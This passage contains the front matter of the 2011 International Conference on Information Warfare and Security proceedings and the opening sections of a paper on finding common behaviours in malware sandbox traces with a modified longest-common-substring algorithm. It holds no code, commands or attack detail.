
The Proceedings<br />

of the<br />

6th International<br />

Conference on Information<br />

Warfare and Security<br />

The George Washington University,<br />

Washington, DC, USA<br />

17-18 March 2011<br />

Edited by<br />

Leigh Armistead<br />

Edith Cowan University<br />

Programme Chair


Copyright The Authors, 2011. All Rights Reserved.<br />

No reproduction, copy or transmission may be made without written permission from the individual authors.<br />

Papers have been double-blind peer reviewed before final submission to the conference. Initially, paper<br />

abstracts were read and selected by the conference panel for submission as possible papers for the<br />

conference.<br />

Many thanks to the reviewers who helped ensure the quality of the full papers.<br />

These Conference Proceedings have been submitted to Thomson ISI for indexing.<br />

Further copies of this book and previous years’ proceedings can be purchased from http://academicconferences.org/2-proceedings.htm<br />

ISBN: 978-1-906638-92-4 Book<br />

Published by Academic Publishing International Limited<br />

Reading<br />

UK<br />

44-118-972-4148<br />

www.academic-publishing.org


Contents<br />

Paper Title (Author(s)) Page No.<br />

Preface iii<br />

Biographies of Conference Chairs, Programme Chair, Keynote Speaker and Mini-track Chairs iv<br />

Biographies of contributing authors v<br />

Using the Longest Common Substring on Dynamic Traces of Malware to Automatically Identify Common Behaviors (Jaime Acosta) 1<br />

Modeling and Justification of the Store and Forward Protocol: Covert Channel Analysis (Hind Al Falasi and Liren Zhang) 8<br />

The Evolution of Information Assurance (IA) and Information Operations (IO) Contracts across the DoD: Growth Opportunities for Academic Research – an Update (Edwin Leigh Armistead and Thomas Murphy) 14<br />

The Uses and Limits of Game Theory in Conceptualizing Cyberwarfare (Merritt Baer) 23<br />

Who Needs a Botnet if you Have Google? (Ivan Burke and Renier van Heerden) 32<br />

Mission Resilience in Cloud Computing: A Biologically Inspired Approach (Marco Carvalho, Dipankar Dasgupta, Michael Grimaila and Carlos Perez) 42<br />

Link Analysis and Link Visualization of Malicious Websites (Manoj Cherukuri and Srinivas Mukkamala) 52<br />

The Strategies for Critical Cyber Infrastructure (CCI) Protection by Enhancing Software Assurance (Mecealus Cronkrite, John Szydlik and Joon Park) 68<br />

Building an Improved Taxonomy for IA Education Resources in PRISM (Vincent Garramone and Daniel Likarish) 76<br />

Using Dynamic Addressing for a Moving Target Defense (Stephen Groat, Matthew Dunlop, Randy Marchany and Joseph Tront) 84<br />

Changing the Face of Cyber Warfare with International Cyber Defense Collaboration (Marthie Grobler, Joey Jansen van Vuuren and Jannie Zaaiman) 92<br />

Cyber Strategy and the Law of Armed Conflict (Ulf Haeussler) 99<br />

eGovernance and Strategic Information Warfare – non Military Approach (Karim Hamza and Van Dalen) 106<br />

Intelligence-Driven Computer Network Defense Informed by Analysis of Adversary Campaigns and Intrusion Kill Chains (Eric Hutchins, Michael Cloppert and Rohan Amin) 113<br />

The Hidden Grand Narrative of Western Military Policy: A Linguistic Analysis of American Strategic Communication (Saara Jantunen and Aki-Mauri Huhtinen) 126<br />

Host-Based Data Exfiltration Detection via System Call Sequences (Brian Jewell and Justin Beaver) 134<br />

Detection of YASS Using Calibration by Motion Estimation (Kesav Kancherla and Srinivas Mukkamala) 143<br />


Developing a Knowledge System for Information Operations (Louise Leenen, Ronell Alberts, Katarina Britz, Aurona Gerber and Thomas Meyer) 151<br />

CAESMA – An On-Going Proposal of a Network Forensic Model for VoIP traffic (Jose Mas y Rubi, Christian Del Carpio, Javier Espinoza and Oscar Nuñez Mori) 160<br />

Secure Proactive Recovery – a Hardware Based Mission Assurance Scheme (Ruchika Mehresh, Shambhu Upadhyaya and Kevin Kwiat) 171<br />

Identifying Cyber Espionage: Towards a Synthesis Approach (David Merritt and Barry Mullins) 180<br />

Security Analysis of Webservers of Prominent Organizations in Pakistan (Muhammad Naveed) 188<br />

International Legal Issues and Approaches Regarding Information Warfare (Alexandru Nitu) 200<br />

Cyberwarfare and Anonymity (Christopher Perr) 207<br />

Catch Me If You Can: Cyber Anonymity (David Rohret and Michael Kraft) 213<br />

Neutrality in the Context of Cyberwar (Julie Ryan and Daniel Ryan) 221<br />

Labelling: Security in Information Management and Sharing (Harm Schotanus, Tim Hartog, Hiddo Hut and Daniel Boonstra) 228<br />

Information Management Security for Inter-Organisational Business Processes, Services and Collaboration (Maria Th. Semmelrock-Picej, Alfred Possegger and Andreas Stopper) 238<br />

Anatomy of Banking Trojans – Zeus Crimeware (how Similar are its Variants) (Madhu Shankarapani and Srinivas Mukkamala) 252<br />

Terrorist use of the Internet: Exploitation and Support Through ICT Infrastructure (Namosha Veerasamy and Marthie Grobler) 260<br />

Evolving an Information Security Curriculum: New Content, Innovative Pedagogy and Flexible Delivery Formats (Tanya Zlateva, Virginia Greiman, Lou Chitkushev and Kip Becker) 268<br />

Research in Progress Papers 277<br />

Towards Persistent Control over Shared Information in a Collaborative Environment (Shada Alsalamah, Alex Gray and Jeremy Hilton) 279<br />

3D Execution Monitor (3D-EM): Using 3D Circuits to Detect Hardware Malicious Inclusions in General Purpose Processors (Michael Bilzor) 289<br />

Towards An Intelligent Software Agent System As Defense Against Botnets (Evan Dembskey and Elmarie Biermann) 299<br />

Theoretical Offensive Cyber Militia Models (Rain Ottis) 308<br />

Work in Progress 315<br />

Large-scale analysis of continuous data in cyber-warfare threat detection (William Acosta) 317<br />

A System and Method for Designing Secure Client-Server Communication Protocols Based on Certificateless PKI (Natarajan Vijayarangan) 320<br />


Preface<br />

These Proceedings are the work of researchers contributing to the 6th International Conference on<br />

Information Warfare and Security (ICIW 2011), hosted this year by the George Washington University,<br />

Washington DC, USA. The Conference Chair is Dr. Julie Ryan from the George Washington University,<br />

Washington, DC, USA and I am again the Programme Chair.<br />

The opening keynote address this year is given by Matthew A. Stern, General Dynamics Advanced<br />

Information Systems, USA. The second day will be opened by Mathew “Pete” Peterson from the Naval<br />

Criminal Investigative Service, USA.<br />

An important benefit of attending this conference is the ability to share ideas and meet the people who hold<br />

them. The range of papers will ensure an interesting and enlightening discussion over the two-day schedule.<br />

The topics covered by the papers this year illustrate the depth of the information operations research area,<br />

with the subject matter ranging from the highly technical to the more strategic visions of the use and<br />

influence of information.<br />

With an initial submission of 97 abstracts, after the double-blind peer review process there are 38 papers<br />

published in these Conference Proceedings, including contributions from Austria, Bangladesh, Estonia,<br />

Finland, India, Iran, Pakistan, Peru, Romania, South Africa, the Netherlands, United Arab Emirates, United<br />

Kingdom and the United States.<br />

I wish you a most enjoyable conference.<br />

March 2011<br />

Leigh Armistead<br />

Edith Cowan University<br />

Programme Chair<br />



Biographies of Conference Chairs, Programme Chair and Keynote Speakers<br />

Conference Chair<br />

Dr. Julie Ryan currently teaches and directs research in Information Assurance at The George Washington University. Prior to joining academia, she worked in various positions in industry and government. Her degrees are from the US Air Force Academy, Eastern Michigan University, and The George Washington University.<br />

Programme Chair<br />

Dr. Edwin “Leigh” Armistead is the Director of Business Development for Goldbelt Hawk LLC, the Programme Chair for the International Conference on Information Warfare and an Adjunct Lecturer at Edith Cowan University in Perth, Australia. He has written nine books and 18 journal articles, presented 17 academic papers and served as Chairman for 16 professional and academic conferences. Formerly Master Faculty at the Joint Forces Staff College, Leigh received his PhD from Edith Cowan University with an emphasis on Information Operations. He also serves as a Co-Editor of the Journal of International Warfare and on the Editorial Review Board of the European Conference on Information Warfare.<br />

Keynote Speakers<br />

Mathew “Pete” Peterson has served in a variety of positions within US government<br />

agencies since 1989, including 13 years on active duty in the U.S. Army. He has<br />

experience in a wide range of domains, including information assurance/information<br />

protection, research, development & acquisition (RDA)/research & technology<br />

protection (RTP), cyber analysis issues, critical infrastructure protection, and threat<br />

analysis. He currently serves as Cyber Analysis Division Chief within the Naval<br />

Criminal Investigative Service, while working towards completion of his dissertation in<br />

the Executive Leadership Doctoral Program at George Washington University’s Virginia<br />

Campus.<br />

Matthew Stern is the director of cyber accounts for General Dynamics Advanced Information Systems. He<br />

also provides subject matter expertise in cyber space operations to the company and its customers. Stern<br />

also represents the company on several boards and advisory groups providing thought leadership to the<br />

cyber security community. He spent 22 years in positions of increasing responsibility in the U.S. Army<br />

culminating with command of 2nd Battalion, 1st Information Operations Command and the Army Computer<br />

Emergency Response Team (ACERT). This is the first unit in U.S. Army history dedicated to cyberspace<br />

operations. Stern is an established expert on information technology, network security, information<br />

operations and special information operations. He is also a recognized visionary regarding the military<br />

conduct of cyberspace operations. He has developed his knowledge and expertise through practical<br />

experience leading his command, the U.S. military data communication services in Iraq, support to the<br />

technical architecture of the U.S. Army’s digitized Armored Corps, and the systems integration for the Land<br />

Information Warfare Activity Information Dominance Center. Stern is also a decorated combat veteran of<br />

Operations DESERT SHIELD/STORM and IRAQI FREEDOM. Matt holds a Master’s degree in Information<br />

Systems and Computer Resource Management from Webster University and a Bachelor of Science degree<br />

in Political Science from Northern Illinois University.<br />



Biographies of contributing authors (in alphabetical order)<br />

Jaime Acosta completed his Ph.D. in Computer Science at the University of Texas at El Paso. Dr. Acosta’s<br />

research has received awards and recognition including the outstanding dissertation award by the University<br />

of Texas at El Paso. Jaime is currently working at the United States Army Research Laboratory conducting<br />

security research.<br />

William Acosta received his Ph.D. from the University of Notre Dame in 2008 and is currently an<br />

assistant professor at the University of Toledo teaching in the Computer Science and Engineering<br />

Technology Program. His prior work included peer-to-peer search and distributed systems. He is currently<br />

working on experimental data systems research focusing on large-scale data analysis.<br />

Hind Al Falasi is currently pursuing a PhD in Information Security at the United Arab Emirates University, Al<br />

Ain, UAE. He received a Bachelor of Science in Information Security from the United Arab Emirates<br />

University. His main research focus is the security of Vehicular Ad hoc Networks.<br />

Rohan Amin is a member of Lockheed Martin's CIRT, who helped grow the team from 5 charter members<br />

with limited responsibilities to an industry-leading entity with global scope. His contributions to the team have<br />

ranged from deeply technical to broadly organizational.<br />

Shada Al-Salamah is a doctoral candidate at the Department of Computer Science & Informatics, Cardiff<br />

University, UK. She received her MSc in Strategic Information Systems with Information Assurance from<br />

Cardiff University and received a BSc in Information Technology from the College of Computer and<br />

Information Sciences, King Saud University, Riyadh, Saudi Arabia.<br />

Merritt Baer is a graduate of Harvard Law School and Harvard College. She has conducted clinical cyberlaw<br />

research at Harvard's Berkman Center for Internet and Society and has published a number of pieces at the<br />

intersection of cybercrime, Constitutional Internet issues and national security. She currently serves as a<br />

judicial clerk at the United States Court of Appeals for the Armed Forces.<br />

Michael Bilzor is a PhD student at the Naval Postgraduate School. He has a B.S. in Computer Science from<br />

the U.S. Naval Academy and an M.S. in Computer Science from Johns Hopkins University. He served in F-14<br />

and F/A-18 squadrons as a Naval Flight Officer until 2005. His research interest is in hardware security.<br />

Ivan Burke is an MSc student in the Department of Computer Science at the University of Pretoria, South<br />

Africa. He also works full time at the Council for Scientific and Industrial Research, South Africa, in the<br />

Department of Defence, Peace, Safety and Security, where he works within the Command, Control and<br />

Information Warfare research group.<br />

Marco Carvalho is a research scientist at the Florida Institute for Human and Machine Cognition (IHMC). He<br />

received his Ph.D. from Tulane University, New Orleans, following a M.Sc. in Computer Science from<br />

University of West Florida, a M.Sc. in Mechanical Engineering from Federal University of Brasilia (UnB), and<br />

a B.Sc. in Mechanical Engineering, also from UnB. His research interests are primarily in the areas of<br />

biologically inspired security and tactical networks.<br />

Mecealus Cronkrite is studying for an M.S. in Information & Security Management at the Syracuse University<br />

School of Information Studies. He is a DHS Career Development Grant fellow and a Graduate Engineering<br />

Minority (GEM) fellow. He gained a B.S. degree in Computer Science in 2009 from the State University at<br />

Brockport, NY. He has spent 7 years in industry in systems integration, programming and analysis, and IT<br />

disaster management roles.<br />

Mike Cloppert is a member of Lockheed Martin's CIRT, who helped grow the team from 5 charter members<br />

with limited responsibilities to an industry-leading entity with global scope. His contributions to the team have<br />

ranged from deeply technical to broadly organizational.<br />

Evan Dembskey is a senior lecturer at UNISA in Pretoria, South Africa. He currently lectures in the area of<br />

computer security. His research interests include IW and technology and science in Ancient Greece and<br />

Rome.<br />

Javier Espinoza was born in Lima, Peru, in August 1971. He studied Electronic Engineering at Pontificia<br />

Universidad Catolica del Peru and completed specialized training in Cisco Certified Network Associate (CCNA),<br />

Structured Wiring and Information System Security. Javier is studying for a Telecommunications Engineering<br />

Master’s degree at Pontificia Universidad Catolica del Peru in Lima, Peru.

Stephen Groat is a PhD student at Virginia Tech in the Bradley Department of Electrical and Computer<br />

Engineering focusing on network security and IPv6. Working in coordination with the Information Technology<br />

Security Office and Lab, Stephen is researching the security implications of IPv6.<br />

Ulf Haeussler is a Legal Advisor in the German Armed Forces and currently seconded to HQ SACT. Prior<br />

to this assignment, Ulf served in multiple German Armed Forces positions as well as at NATO HQ, and was<br />

deployed to NATO operations as a reservist on active duty. Ulf is widely published on international law.<br />

Karim Hamza works as an Academic Researcher at the Maastricht School of Management (Netherlands),<br />

Part Time Professor at the American University (Egypt) and Approved Tutor for Edinburgh Business School<br />

(UK). Additionally, he works as a Business Development Manager in one of the leading information<br />

technology companies specialized in Enterprise Resource Planning applications for governments and private<br />

sectors.<br />

Tim Hartog graduated in 2005 at the Technical University of Twente, in the Netherlands. Since then he has<br />

been active in the field of Information Security. During his work at TNO, the Dutch Organization for Applied<br />

Scientific Research, Tim has been working in the areas of Trusted Computing, Trusted Operating Systems<br />

and Cross Domain Solutions.<br />

Saara Jantunen studies leadership as a doctoral student in the Finnish Defence University. She has studied<br />

English language and culture at the University of Groningen in the Netherlands and English philology in the<br />

University of Helsinki, Finland. Her research interests include language & identity and military discourse.<br />

Jantunen currently works in education.<br />

Brian Jewell is a graduate student with an emphasis on Information Security at Tennessee Technological<br />

University. He received his B.S. in Computer Science from Murray State University. During summer 2010 he<br />

interned at Oak Ridge National Laboratory in the Applied Software Engineering Research group. His<br />

research is in the area of host intrusion detection and response.<br />

Louise Leenen is a Senior Researcher at the South African Council for Scientific and Industrial Research in<br />

the Defence, Peace, Safety and Security (DPSS) unit which focuses on defence related research and<br />

development. She holds a PhD in Computer Science from the University of Wollongong in Australia.<br />

Dan Likarish is a Director of the Center on Information Assurance Studies and faculty at Regis University<br />

School of Information and Computer Science. For many years he has been the advisor for undergraduate<br />

and graduate students with an interest in IS and IT problems. His research interests are in rapid curriculum<br />

development and deployment in conjunction with virtual worlds.<br />

Jose Luis Mas y Rubi studied Systems Engineering at the Instituto Universitario Politecnico Santiago<br />

Mariño in Barcelona, Venezuela. He has a Cisco CCNA certification in networking. He is currently studying<br />

for a Telecommunications Engineering Master degree at Pontificia Universidad Catolica del Peru in Lima,<br />

Peru.<br />

Ruchika Mehresh is a doctoral student of Computer Science and Engineering at the State University of New<br />

York at Buffalo. Her research focuses on reliability and security in fault-tolerant computing. She has worked<br />

on research projects funded by the U.S. Air Force Research Laboratory.<br />

David Merritt received his B.S. in computer engineering from the U.S. Air Force Academy. He is an<br />

Undergraduate Network Warfare Training graduate, holds CISSP and GSEC certifications, and spent 3 years<br />

on the Air Force Computer Emergency Response Team. David is an active duty officer attending the Air<br />

Force Institute of Technology in Ohio.<br />

Srinivas Mukkamala is a senior research scientist with ICASA (Institute for Complex Additive Systems<br />

Analysis), Adjunct Faculty in the Computer Science Department of New Mexico Tech, an advisor to Cyber Security<br />

Works, and co-founder/managing partner of CAaNES LLC. He received his Ph.D. from New Mexico Tech in<br />

2005. He is a frequent speaker on information assurance in conferences and tutorials across the world.<br />

Muhammad Naveed completed a B.Sc. degree in Electrical Engineering (with a major in communication) at the<br />

University of Engineering and Technology (UET), Peshawar, Pakistan, in 2010. He is currently a lecturer in the<br />

Department of Computer Science, IQRA University, Peshawar, Pakistan. His research interests include<br />

information security and cryptography.<br />

Alexandru Nitu is a legal counselor at the Romanian Intelligence Service, with nine years of experience in<br />

matters regarding human rights protection. He is involved in legal studies referring to the impact of the<br />

intelligence activities on respecting citizens’ fundamental rights and liberties.<br />

Rain Ottis is a scientist at the Cooperative Cyber Defence Centre of Excellence. He is a graduate of the<br />

United States Military Academy and Tallinn University of Technology (MSc, Informatics). He continues his<br />

studies in a PhD program at Tallinn University of Technology, where he focuses on politically motivated<br />

cyber attack campaigns by non-state actors.<br />

Christopher Perr is currently a PhD candidate at Auburn University studying computer and network security.<br />

He holds a B.S. in Computer Science from the Air Force Academy and a Master of Software Engineering<br />

from Auburn University.<br />

David Rohret works for CSC, Inc. at the Joint Information Operations Warfare Center (JIOWC). For over fifteen years he<br />

has pursued network security interests to include developing and vetting exploits for use on established red<br />

teams and adversarial research. He holds degrees in Computer Science from the University of Iowa and La<br />

Salle University.<br />

Shambhu Upadhyaya is Professor of Computer Science and Engineering at the State University of New<br />

York at Buffalo. His research interests are computer security, information assurance, fault-tolerant<br />

computing, distributed systems and reliability. His research has been funded by federal agencies such as<br />

National Science Foundation, U.S. Air Force Research Laboratory, DARPA, National Security Agency and<br />

industries such as IBM, Intel, Cisco and Harris Corporation.<br />

Namosha Veerasamy obtained a BSc (IT) Computer Science degree, and both a BSc (Honours) and an MSc in Computer<br />

Science with distinction, from the University of Pretoria. She is<br />

currently employed as a researcher at the Council for Scientific and Industrial Research (CSIR) in Pretoria.<br />

Namosha is also qualified as a Certified Information System Security Professional (CISSP).<br />

Natarajan Vijayarangan is a senior scientist at TCS. He obtained his Ph.D. in Mathematics in 2001 from<br />

RIASM, University of Madras. He received 'Best Research Paper Award' of Ramanujan Mathematical<br />

Society in 2000. He has published patents, papers and books in the field of Information Security. He has<br />

participated in NIST SHA-3 competition and received 'AIP Anchor Award'.<br />

Jannie Zaaiman (B Comm, B Proc, HBA, MBA, PhD) is Deputy Vice Chancellor: Operations at the<br />

University of Venda, and is the former Executive Dean, Faculty of Information and Communication<br />

Technology at the Tshwane University of Technology (TUT). Before joining TUT, Jannie was Group<br />

Company Secretary of Sasol, Managing Executive: Outsourcing and Divestitures at Telkom and Group<br />

Manager at Development Bank of Southern Africa.<br />

Tanya Zlateva completed her doctorate at the Dresden University of Technology, Germany, and<br />

postdoctoral training at the Harvard-MIT Division for Health Sciences and Technology. Her research interests<br />

include application level security, biometrics, and new educational technologies. She currently serves as<br />

director of Boston University's Center for Reliable Information Systems and Cyber Security.<br />



Conference Executive:<br />

Michael Grimaila, Center for Cyberspace Research, WPAFB, Ohio, USA<br />

Dorothy Denning, Naval Postgraduate School, Monterey, CA, USA<br />

Doug Webster, MITRE Corporation - United States Strategic Command's Global Innovation & Strategy<br />

Center<br />

Kevin Streff, Dakota State University, USA<br />

Andy Jones, Security Research Centre, British Telecom, UK and Khalifa University, UAE<br />

William Mahoney, University of Nebraska Omaha, Omaha, USA<br />

Dan Kuehl, National Defense University, Washington DC, USA<br />

Corey Schou, Idaho State University, USA<br />

Committee Members:<br />

The conference programme committee consists of key people in the information systems, information<br />

warfare and information security communities around the world. The following people have confirmed their<br />

participation:<br />

Jim Alves-Foss (University of Idaho, USA); Todd Andel (Air Force Institute of Technology, USA); Leigh Armistead (Edith Cowan University, Australia); Johnnes Arreymbi (University of East London, UK); Rusty Baldwin (Air Force Institute of Technology, USA); Richard Baskerville (Georgia State University, USA); Allan Berg (Critical Infrastructure and Cyber Protection Center, Capitol College, USA); Sviatoslav Braynov (University of Illinois, USA); Blaine Burnham (University of Nebraska, Omaha, USA); Catharina Candolin (Finnish Defence Forces, Helsinki, Finland); Rodney Clare (EDS and the Open University, UK); Nathan Clarke (University of Plymouth, UK); Geoffrey Darnton (University of Bournemouth, UK); Dipankar Dasgupta (Intelligent Security Systems, USA); Dorothy Denning (Naval Postgraduate School, USA); Glenn Dietrich (University of Texas, USA); David Fahrenkrug (US Air Force, USA); Kevin Gleason (KMG Consulting, MA, USA); Sanjay Goel (University at Albany, USA); Michael Grimaila (Air Force Institute of Technology, Ohio, USA); Daniel Grosu (Wayne State University, USA); Drew Hamilton (Auburn University, USA); Dwight Haworth (University of Nebraska at Omaha, USA); Philip Hippensteel (Penn State University, USA); Jeffrey Humphries (Air Force Institute of Technology, USA); Bill Hutchinson (Edith Cowan University, Australia); Berg P Hyacinthe (Assas School of Law, Universite Paris, France); Andy Jones (British Telecom, UK); James Joshi (University of Pittsburgh, USA); Leonard Kabeya Mukeba (Kigali Institute of Science and Technology, Rwanda); Prashant Krishnamurthy (University of Pittsburgh, USA); Dan Kuehl (National Defense University, USA); Stuart Kurkowski (Air Force Institute of Technology, USA); Takakazu Kurokawa (National Defense Academy, Japan); Rauno Kuusisto (National Defence College, Finland); Tuija Kuusisto (Internal Security ICT Agency, Finland); Arun Lakhotia (University of Louisiana Lafayette, USA); Sam Liles (Purdue University Calumet, USA); Cherie Long (Clayton State University, Decatur, USA); Brian Lopez (Lawrence Livermore National Laboratory, USA); Juan Lopez (Air Force Institute of Technology, USA); Bin Lu (West Chester University, USA); Bill Mahoney (University of Nebraska, USA); John McCarthy (Buckinghamshire and Chiltern University College, UK); J Todd McDonald (Air Force Institute of Technology, USA); Robert Mills (Air Force Institute of Technology, Ohio, USA); Don Milne (Buckinghamshire and Chiltern University College, UK); Srinivas Mukkamala (New Mexico Tech, Socorro, USA); Barry Mullins (Air Force Institute of Technology, USA); Andrea Perego (Università degli Studi dell’Insubria, Italy); Gilbert Patterson (Air Force Institute of Technology, USA); Richard Raines (Air Force Institute of Technology, USA); Ken Revett (University of Westminster, UK); Neil Rowe (US Naval Postgraduate School, USA); Julie Ryan (George Washington University, USA); Corey Schou (Idaho State University, USA); Dan Shoemaker (University of Detroit Mercy, USA); William Sousan (University of Nebraska, Omaha, USA); Kevin Streff (Dakota State University, USA); Dennis Strouble (Air Force Institute of Technology, USA); Eric Trias (Air Force Institute of Technology, USA); Doug Twitchell (Illinois State University, USA); Renier van Heerden (CSIR, Pretoria, South Africa); Stylianos Vidalis (Newport Business School, UK); Fahad Waseem (University of Northumbria, UK); Kenneth Webb (Edith Cowan University, Australia); Douglas Webster (USSTRATCOM Global Innovation & Strategy Center, USA); Zehai Zhou (Dakota State University, USA).<br />



Using the Longest Common Substring on Dynamic Traces<br />

of Malware to Automatically Identify Common Behaviors<br />

Jaime Acosta<br />

Army Research Laboratory, White Sands, NM, USA<br />

jaime.acosta1@us.army.mil<br />

Abstract: A large amount of research is focused on identifying malware. Once identified, the behavior of the<br />

malware must be analyzed to determine its effects on a system. This can be done by tracing through a malware<br />

binary using a disassembler or logging its dynamic behavior using a sandbox (virtual machines that execute a<br />

binary and log all dynamic events such as network, registry, and file manipulations). However, even with these<br />

tools, analyzing malware behavior is very time consuming for an analyst. In order to alleviate this, recent work<br />

has identified methods to categorize malware into “clusters” or types based on common dynamic behavior. This<br />

allows a human analyst to look at only a fraction of malware instances–those most dissimilar. Still missing are<br />

techniques that identify similar behaviors among malware of different types. Also missing is a way to<br />

automatically identify differences among same-type malware instances to determine whether the differences are<br />

benign or are the key malicious behavior. The research presented here shows that a wide collection of malware<br />

instances have common dynamic behavior regardless of their type. This is a first step toward enabling an analyst<br />

to more efficiently identify malware instances’ effects on systems by reducing the need for redundant analysis<br />

and allowing filtration of common benign behavior. This research uses the publicly available Reference Data Set<br />

that was collected over a period of three years. Malware instances were identified and assigned a type by six<br />

anti-malware scanners. The dataset consists of dynamic trace events of 3131 malware instances generated by<br />

CWSandbox. For this research, the dataset is separated into two sets: small and large. The small set contains<br />

2071 instances of malware that are less than 100 KB in size. The large set contains 1060 instances of malware<br />

that are between 100 KB and 3.4 MB in size. In order to measure the common behavior between the small and<br />

large sets, common sequential event sequences within each malware instance in the small set are identified<br />

using a modified version of the longest common substring algorithm. Once identified, all appearances of these<br />

common event sequences are removed from the large set to determine shared behavior. Most common<br />

sequences are between length 2 and 60 events. Results indicate that when using length 2 event sequences and<br />

higher, on average, the large set instances share 96% of event sequences, with length 6 and higher event<br />

sequences–66%, and with length 12 and higher event sequences–50%. This indicates that an analyst’s workload<br />

can be largely reduced by removing common behavior sequences. Furthermore, it shows that malware instances<br />

may not always fall into exclusive categories. It may be more beneficial to instead identify behaviors and map<br />

them to malware instances, for example, as with the Malware Attribute Enumeration and Characterization<br />

(MAEC). Future efforts may look into attaching semantic labels on long sequences that are common to many<br />

malware instances in order to aid the analyst further.<br />

Keywords: malware, similarity, dynamic, analysis, substring<br />

1. Introduction<br />

As the number of malware instances grows each year, there is a need for automated methods that<br />

can efficiently identify, classify, and reduce the amount of data that an analyst has to review pertaining<br />

to malware. This paper focuses on identifying similarities among known malware instances in order to<br />

reduce an analyst’s workload.<br />

Automatic malware detection has been researched extensively in the past (Vinod et al., 2009). When<br />

malware is identified, it is assigned a type or name. The malware binary behavior is analyzed in detail<br />

in order to provide alerts, recover data, and assess damage, among other tasks. Recently, there have been<br />

two main approaches to accomplish this: static and dynamic analysis. In static analysis, the malware<br />

binary is reverse engineered using a disassembler. This method can be very time consuming,<br />

especially due to obfuscation techniques such as polymorphism (Kasina et al., 2010), metamorphism<br />

(Lee et al., 2010), memory packing (Han et al., 2010), and virtualization (Sharif et al., 2009). Dynamic<br />

analysis, on the other hand, involves running the malware binary in a controlled environment known as<br />

a sandbox, e.g., Norman (Norman Solutions, 2003), Anubis (Bayer et al., 2006), CWSandbox<br />

(Willems et al., 2007), where every event during the malware’s execution is logged to an event trace.<br />

State-of-the-art sandboxes have the ability to fast-forward time to elicit delayed malware execution<br />

and can even simulate user interaction. Current techniques, e.g., (Rieck et al., 2010), use clustering<br />

methods in order to group similar malware based on their events during runtime, but still require<br />

manual analysis to identify specific similarities and differences.<br />


The research presented here uses a dataset that consists of sandbox event traces of 3131 malware<br />

instances. Manual observation of the dataset revealed many behavior patterns that were shared<br />

across many instances, such as file replacements (which involve a series of system calls). At first<br />

glance these patterns seem complex and overwhelming, but they were made simple by replacing the common<br />

behaviors with short annotations. This paper is a step toward automating this process.<br />

The following are the contributions resulting from the work described in this paper:<br />

- This research provides a methodology showing how the longest common substring algorithm can be modified to conduct similarity analysis on malware using dynamic event traces. This similarity may be due to code reuse, which arises both from legitimate third-party libraries and from reusing infected or malicious code.<br />

- Use of this algorithm shows that even though the malware instances in this dataset are of different types (as assigned by anti-virus programs), they share a large number of common behaviors. This means that malware authors reuse code, and that an analyst could exploit this overlap to eliminate duplicate processing.<br />

- This research shows that the common behaviors identified are not limited to short, trivial event sequences; there are many long sequences. This indicates that it may be possible to replace semantically rich event sequences with natural-language annotations to facilitate analysis.<br />

2. Related work<br />

Because of the large number of new malware instances introduced each year, there has been a large<br />

amount of work to aid in each stage of the malware analysis workflow.<br />

The first step in analysis is data collection. Tools that aid in this collection include Nepenthes<br />

(Baecher et al., 2006), Amun (Göbel, 2009), and honeypots (Provos, 2004). After collection, the<br />

malware instances are analyzed using static (source code) or dynamic (event traces) techniques. In<br />

the past decade there have been a wide variety of techniques used for static and dynamic analysis of<br />

legitimate source code, with the goal of exploiting program semantics in an efficient way (Cornelissen,<br />

2009). Related to malware, there have been many techniques that exploit characteristics unique to<br />

malware, including malicious behavior, small program size, and code reuse among instances.<br />

In both static and dynamic analysis techniques, one method that has had recent attention is using<br />

machine learning to cluster similar malware instances. Clustering methods are useful because they<br />

generalize large sets of malware into categories with limited need for manual human intervention.<br />

Jang and Brumley (2009) perform static analysis by identifying areas of code reuse through clustering<br />

malware binaries. Their clustering method uses Bloom filters, which identify similarity of malware<br />

instances by applying hashing techniques to fixed-size chunks of the malware executable code.<br />

On the other hand, Bayer et al. (2009) use machine learning algorithms to identify similarities in<br />

malware instances by comparing their dynamic event traces, which include system calls, their<br />

dependencies, and network behavior. Next, the malware instances are clustered based on their<br />

dynamic behavior. A limitation of this approach is that the algorithm is trained with a fixed set of<br />

malware. It does not allow retraining with additional malware samples during the clustering phase.<br />

Rieck extends this with his Malheur (Rieck et al., 2010) system by establishing an iterative<br />

mechanism that consists of clustering and then classifying new instances into existing clusters. In his<br />

work, similarity is determined by the presence of shared fixed-length instruction sequences. In<br />

addition, Rieck also uses a dynamic trace representation format called MIST (Trinius et al., 2010) that<br />

allows prioritization of event parameters (e.g., an openfile system call may have the file name, file<br />

type, and the file path as parameters). This is meant to allow more efficient processing for machine<br />

learning algorithms by reducing the input file size by leaving out less-critical parameters. MIST also<br />

provides a common file format to which the output of many available sandboxes can be converted.<br />

After the instances are clustered, an analyst may have to conduct deeper investigation, such as exact<br />

differences and similarities in the binaries. It may be the case that malware in different clusters share<br />

common behaviors. This results in redundant analysis by a human analyst. Another issue is that<br />

instances in a cluster are not exactly the same. There may be malicious behavior that is unique to one<br />

instance within a cluster. One way to alleviate these issues is to develop techniques that, instead of<br />

determining similarity using fixed-size sequences as in previous work, are not tied to sequence<br />

length and automatically detect variable-sized, semantically representative sequences.<br />


Some techniques that use semantic structure for finding similarity are in code-clone detection<br />

research. These techniques have been used to identify redundancy to reduce program size or to<br />

identify plagiarism in legitimate software (Roy and Cordy, 2007). The problem with using these<br />

techniques for identifying similarity and differences in malware is that the source code of malware is<br />

not available. Some attempts have been made to analyze the sequences of instructions of<br />

disassembled binaries to determine whether they are malicious. One method compared the<br />

disassembled code against behavior templates that are known to exist in malware. These templates<br />

are able to capture malicious behavior, even if the malware has small variation (Christodorescu et al.,<br />

2005). Another method (Ye et al., 2007) uses the Intelligent Malware Detection System (IMDS), to<br />

identify malware instances by checking if certain sequences of Application Programming Interface<br />

(API) calls exist in a binary Portable Executable (PE) file. A limitation of both of these examples is that<br />

they assume the binary file is not packed and is not virtualized.<br />

In this paper the longest common substring algorithm is modified and used to identify common event<br />

sequences of varying size among a set of malware. Also, the algorithm works on the dynamic traces<br />

of malware, which are evident even if the malware is packed or virtualized.<br />

3. Dataset<br />

3.1 Sandbox environment<br />

The dataset used for this research was obtained from the Malheur website (http://pi1.informatik.uni-mannheim.de/malheur/)<br />

and was collected over a period of three years. In particular, the Reference<br />

dataset is used, which consists of the dynamic trace events of 3131 malware instances that are<br />

grouped into 24 types, as assigned by six anti-virus scanners. The dynamic traces of the malware<br />

instances were generated by CWSandbox. The event traces range in size from 700 B to 3.4 MB. The<br />

traces are encoded in the Malware Instruction Set (MIST) format and are in sequential order.<br />

Furthermore, the traces are separated by thread behaviors of the executable.<br />

3.2 MIST<br />

